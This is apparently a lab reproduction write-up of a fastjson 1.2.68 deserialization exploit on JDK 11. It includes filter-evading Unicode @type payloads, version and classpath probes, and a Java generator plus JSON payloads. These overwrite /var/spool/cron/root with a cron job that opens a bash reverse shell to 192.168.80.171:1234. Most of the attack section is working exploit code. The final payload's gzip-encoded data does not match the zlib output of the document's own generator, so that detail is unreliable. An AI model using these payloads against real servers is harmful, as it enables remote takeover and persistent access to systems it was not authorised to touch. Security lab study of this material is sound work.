Reference: https://github.com/lemono0/FastJsonPart
The main focus here is reproducing the process to understand the exploitation flow. There are many excellent write-ups by experts online, but they are thin on the basics (especially compiling the Java file in IDEA, resolving dependency issues, and so on -__-|), so I am documenting my own reproduction process.
07-1268-jkd11-writefile
Capture the request, remove a bracket to trigger a parse error, and determine the fastjson version from the resulting error.
A DNS-log probe for fastjson turns out to be filtered, so encode `@type` in Unicode:
```json
{
    "\u0040\u0074\u0079\u0070\u0065": "java.net.InetSocketAddress" {
        "address": ,
        "val": "1bdmkeljntnmdy5h5nf3h571tszjn9by.oastify.com"
    }
}
```
The DNS log receives a request, confirming fastjson. Next, probe the version:
```json
{
    "\u0040\u0074\u0079\u0070\u0065": "java.lang.AutoCloseable"
```
Probe dependencies:
```json
{
    "x": {
        "\u0040\u0074\u0079\u0070\u0065": "java.lang.Character"{
            "\u0040\u0074\u0079\u0070\u0065": "java.lang.Class",
            "val": "java.net.http.HttpClient"
        }
    }
}
```
A `can not cast to char` response indicates that `java.net.http.HttpClient` is present, which means the target runs JDK 11.
`org.springframework.web.bind.annotation.RequestMapping` is a class specific to Spring Boot, so the same probe confirms a Spring Boot environment:
```json
{
    "x": {
        "\u0040\u0074\u0079\u0070\u0065": "java.lang.Character"{
            "\u0040\u0074\u0079\u0070\u0065": "java.lang.Class",
            "val": "org.springframework.web.bind.annotation.RequestMapping"
        }
    }
}
```
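Why this error-based probe works: fastjson loads the class named in `val` for the inner `java.lang.Class`, then fails to cast the result to `Character`, so the error only appears when the class actually exists on the target. The same presence check can be sketched locally with plain `Class.forName` (the class name `ClassProbe` and the nonexistent placeholder class are mine, for illustration only):

```java
public class ClassProbe {
    // Returns true if the named class is present on this JVM's classpath.
    static boolean isPresent(String name) {
        try {
            Class.forName(name, false, ClassProbe.class.getClassLoader());
            return true;
        } catch (ClassNotFoundException e) {
            return false;
        }
    }

    public static void main(String[] args) {
        System.out.println(isPresent("java.lang.String"));        // true on any JVM
        System.out.println(isPresent("com.example.NoSuchClass")); // false (placeholder name)
        // True on JDK 11+, false on JDK 8 - exactly the distinction the probe makes:
        System.out.println(isPresent("java.net.http.HttpClient"));
    }
}
```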
With JDK 11 confirmed, an unrestricted file write can be performed; a scheduled task (cron job) is used to get a reverse shell.
Generate the exploit file, `jdk11.java`:
```java
import com.alibaba.fastjson.JSON;

import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.util.Arrays;
import java.util.Base64;
import java.util.zip.Deflater;

public class jdk11 {
    // Deflate the cron line and Base64-encode it for the "array" field.
    public static String gzcompress(String code) {
        byte[] data = code.getBytes();
        byte[] output = new byte[0];
        Deflater compresser = new Deflater();
        compresser.reset();
        compresser.setInput(data);
        compresser.finish();
        ByteArrayOutputStream bos = new ByteArrayOutputStream(data.length);
        try {
            byte[] buf = new byte[1024];
            while (!compresser.finished()) {
                int i = compresser.deflate(buf);
                bos.write(buf, 0, i);
            }
            output = bos.toByteArray();
        } catch (Exception e) {
            output = data;
            e.printStackTrace();
        } finally {
            try {
                bos.close();
            } catch (IOException e) {
                e.printStackTrace();
            }
        }
        compresser.end();
        System.out.println(Arrays.toString(output));
        return Base64.getEncoder().encodeToString(output);
    }

    public static void main(String[] args) throws Exception {
        String code = gzcompress("* * * * * bash -i >& /dev/tcp/192.168.80.171/1234 0>&1 \n");
        // <= 1.2.68 and JDK 11
        String payload = "{\r\n"
                + "  \"@type\":\"java.lang.AutoCloseable\",\r\n"
                + "  \"@type\":\"sun.rmi.server.MarshalOutputStream\",\r\n"
                + "  \"out\":\r\n"
                + "  {\r\n"
                + "    \"@type\":\"java.util.zip.InflaterOutputStream\",\r\n"
                + "    \"out\":\r\n"
                + "    {\r\n"
                + "      \"@type\":\"java.io.FileOutputStream\",\r\n"
                + "      \"file\":\"/var/spool/cron/root\",\r\n"
                + "      \"append\":false\r\n"
                + "    },\r\n"
                + "    \"infl\":\r\n"
                + "    {\r\n"
                + "      \"input\":\r\n"
                + "      {\r\n"
                + "        \"array\":\"" + code + "\",\r\n"
                + "        \"limit\":1999\r\n"
                + "      }\r\n"
                + "    },\r\n"
                + "    \"bufLen\":1048576\r\n"
                + "  },\r\n"
                + "  \"protocolVersion\":1\r\n"
                + "}\r\n";
        System.out.println(payload);
        JSON.parseObject(payload);
    }
}
```
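The compression step and what happens server-side can be verified locally with only the standard library: the `InflaterOutputStream` gadget decompresses whatever is written through it onto the underlying stream (here, the cron file). A minimal round-trip sketch, assuming the default zlib format on both sides (class name `RoundTrip` is mine):

```java
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.util.Base64;
import java.util.zip.Deflater;
import java.util.zip.InflaterOutputStream;

public class RoundTrip {
    // Deflate, mirroring gzcompress() in the exploit above.
    static byte[] deflate(String s) throws IOException {
        Deflater d = new Deflater();
        d.setInput(s.getBytes(StandardCharsets.UTF_8));
        d.finish();
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        byte[] buf = new byte[1024];
        while (!d.finished()) {
            bos.write(buf, 0, d.deflate(buf));
        }
        d.end();
        return bos.toByteArray();
    }

    // What the server-side gadget does: bytes written through the
    // InflaterOutputStream come out decompressed on the target stream.
    static String inflate(byte[] compressed) throws IOException {
        ByteArrayOutputStream target = new ByteArrayOutputStream();
        try (InflaterOutputStream ios = new InflaterOutputStream(target)) {
            ios.write(compressed);
        }
        return target.toString("UTF-8");
    }

    public static void main(String[] args) throws IOException {
        String cron = "* * * * * bash -i >& /dev/tcp/192.168.80.171/1234 0>&1 \n";
        byte[] compressed = deflate(cron);
        System.out.println(Base64.getEncoder().encodeToString(compressed));
        System.out.println(inflate(compressed).equals(cron)); // true
    }
}
```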
Generate payload.
Note: when writing the scheduled task, several points need attention:

- Linux distributions differ: CentOS and Ubuntu use different file locations and mechanisms. The target here is CentOS, so the task is written to `/var/spool/cron/root`. On Ubuntu it should be written to the system-level `/etc/crontab`, not to `/var/spool/cron/crontabs/root`, since the latter would require permission changes and a restart of the cron service.
- When writing the task through this file-write vulnerability, the command must end with a newline so that it forms a complete line; otherwise the reverse shell will not trigger.
```json
{
    "\u0040\u0074\u0079\u0070\u0065":"java.lang.AutoCloseable",
    "\u0040\u0074\u0079\u0070\u0065":"sun.rmi.server.MarshalOutputStream",
    "out":
    {
        "\u0040\u0074\u0079\u0070\u0065":"java.util.zip.InflaterOutputStream",
        "out":
        {
            "\u0040\u0074\u0079\u0070\u0065":"java.io.FileOutputStream",
            "file":"/var/spool/cron/root",
            "append":false
        },
        "infl":
        {
            "input":
            {
                "array":"eJzTUtCCQoWkxOIMBd1MBTs1Bf2U1DL9kuQCfUNLIz1DMws9CwM9Q3NDfUMjYxMFAzs1QwUuAHKnDGw=",
                "limit":1999
            }
        },
        "bufLen":1048576
    },
    "protocolVersion":1
}
```
The `limit` field must hold the length of the real data written to the file. This length may not match the length of the cron command due to compression and encoding, so the error message is used again: first set `limit` as large as possible, and fastjson will throw an error reporting the correct data offset because the given offset is wrong. Here that value is 59, so 59 is the actual data length.
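The same length can also be recovered locally: after a zlib stream is fully inflated, `Inflater.getBytesRead()` reports how many compressed bytes were actually consumed, ignoring any trailing junk. A sketch under that assumption (class name `LimitProbe` and the helper methods are mine):

```java
import java.util.Arrays;
import java.util.zip.DataFormatException;
import java.util.zip.Deflater;
import java.util.zip.Inflater;

public class LimitProbe {
    // Deflate in one shot; the buffer is large enough for short cron lines.
    static byte[] compress(byte[] data) {
        Deflater d = new Deflater();
        d.setInput(data);
        d.finish();
        byte[] out = new byte[4096];
        int n = d.deflate(out);
        d.end();
        return Arrays.copyOf(out, n);
    }

    // Inflate and report how many compressed bytes were actually consumed;
    // this is the length that belongs in the "limit" field.
    static int realLength(byte[] compressedWithJunk) throws DataFormatException {
        Inflater inf = new Inflater();
        inf.setInput(compressedWithJunk);
        byte[] sink = new byte[4096];
        while (!inf.finished()) {
            inf.inflate(sink);
        }
        int consumed = (int) inf.getBytesRead();
        inf.end();
        return consumed;
    }

    public static void main(String[] args) throws DataFormatException {
        byte[] cron = "* * * * * bash -i >& /dev/tcp/192.168.80.171/1234 0>&1 \n".getBytes();
        byte[] compressed = compress(cron);
        // Simulate trailing bytes after the real zlib stream.
        byte[] padded = Arrays.copyOf(compressed, compressed.length + 16);
        System.out.println(realLength(padded) == compressed.length); // true
    }
}
```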
```json
{
    "\u0040\u0074\u0079\u0070\u0065":"java.lang.AutoCloseable",
    "\u0040\u0074\u0079\u0070\u0065":"sun.rmi.server.MarshalOutputStream",
    "out":
    {
        "\u0040\u0074\u0079\u0070\u0065":"java.util.zip.InflaterOutputStream",
        "out":
        {
            "\u0040\u0074\u0079\u0070\u0065":"java.io.FileOutputStream",
            "file":"/var/spool/cron/root",
            "append":false
        },
        "infl":
        {
            "input":
            {
                "array":"H4sIAAAAAAAAANNS0IJChaTE4gwF3UwFOzUF/ZTUMv2S5AJ9Q0sjPUMzCz0LAz1Dc0N9QyNjEwUDOzVDBS4AGWjIeTkAAAA=",
                "limit":59
            }
        },
        "bufLen":1048576
    },
    "protocolVersion":1
}
```
The reverse shell is triggered.